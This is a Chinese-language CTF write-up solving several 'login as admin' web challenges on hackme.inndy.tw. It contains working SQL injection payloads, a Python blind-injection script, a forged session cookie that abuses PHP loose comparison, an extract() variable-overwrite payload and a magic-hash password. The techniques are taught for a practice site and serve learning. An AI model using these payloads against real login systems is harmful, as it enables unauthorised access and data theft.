hackme.inndy.tw的19道web题解(中)
hackme.inndy.tw的19道web题解(中)
目录
- 写在前面
- ......
- login as admin 0
- Login as Admin 0.1
- login as admin 1.2
- login as admin 3
- login as admin 4
- login as admin 6
- login as admin 7
- 待续...
写在前面
最近发现了一个比较有趣的ctf-oj,给出链接
https://hackme.inndy.tw/
里面有不少web题,我这里
因为依照出题人的要求:
本次文章不会直接给出flag,但是会有详细的分析和攻击脚本
0x08 login as admin 0.1
admin\' union select 1,2,3,4#
发现2会回显
构造
admin\' union select 1,database(),3,4#
数据库名login_as_admin0
故此
admin\' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),3,4#
发现表名h1dden_f14g
admin\' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x68316464656e5f66313467 limit 0,1),3,4#
发现字段名the_f14g
admin\' union select 1,(select the_f14g from h1dden_f14g limit 0,1),3,4#
拿到flag
0x09 Login as Admin 1
关注过滤
php
function safe_filter($str)
{
$strl = strtolower($str);
if (strstr($strl, ' ') || strstr($strl, '1=1') || strstr($strl, "''") ||
strstr($strl, 'union select') || strstr($strl, 'select ')
) {
return '';
}
return str_replace("'", "\\'", $str);
}多了个空格过滤,用/**/绕过即可,对于union select等过滤也十分不严谨,所以修改上题payload即可
admin\'/**/or/**/1/**/limit/**/0,1#
即可
0x10 login as admin 1.2
这次union select不会回显了,选择盲注
但是太卡了……我就没跑……大致脚本如下,测试数据库名正常
python
import requests
url = "https://hackme.inndy.tw/login1/index.php"
flag = ""
for i in range(1,100):
for j in range(33,127):
payload = "admin\\'/**/or/**/(ascii(substr((select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1),%s,1))=%s)/**/limit/**/0,1#"%(i,j)
data = {
"name":payload,
"password":"1"
}
r = requests.post(url=url,data=data)
if "You are not admin!" in r.content:
flag += chr(j)
print flag
break0x11 login as admin 3
关键代码
php
function load_user()
{
global $secret, $error;
if(empty($_COOKIE['user'])) {
return null;
}
$unserialized = json_decode(base64_decode($_COOKIE['user']), true);
$r = hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig'];
if(hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']) {
$error = 'Invalid session';
return false;
}
$data = json_decode($unserialized['data'], true);
return [
'name' => $data[0],
'admin' => $data[1]
];
}发现存在弱比较:
我们只要构造出sig=0即可轻松绕过消息认证码检测:
hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']
所以构造如下:
php
function set_user()
{
$user = ['admin',true];
$data = json_encode($user);
$sig = 0;
$all = base64_encode(json_encode(['sig' => $sig, 'data' => $data]));
echo $all;
}
set_user();所以cookie里添加user=eyJzaWciOjAsImRhdGEiOiJbXCJhZG1pblwiLHRydWVdIn0=刷新即可得到flag
0x12 login as admin 4
代码逻辑问题,用户名为admin直接可以成功
直接curl -d "name=admin" https://hackme.inndy.tw/login4/
即可获取flag
0x13 login as admin 6
发现关键代码
php
if(!empty($_POST['data'])) {
try {
$data = json_decode($_POST['data'], true);
} catch (Exception $e) {
$data = [];
}
extract($data);
if($users[$username] && strcmp($users[$username], $password) == 0) {
$user = $username;
}
}其中可以变量覆盖:
extract($data);
所以我们构造:
data = {"users":{"admin":"sky"},"username":"admin","password":"sky"}
即可绕过,并且成功登陆
0x014 login as admin 7
0e开头的md5弱比较
选择:
name = admin
password = QNKCDZO
即可
腾讯云开发者
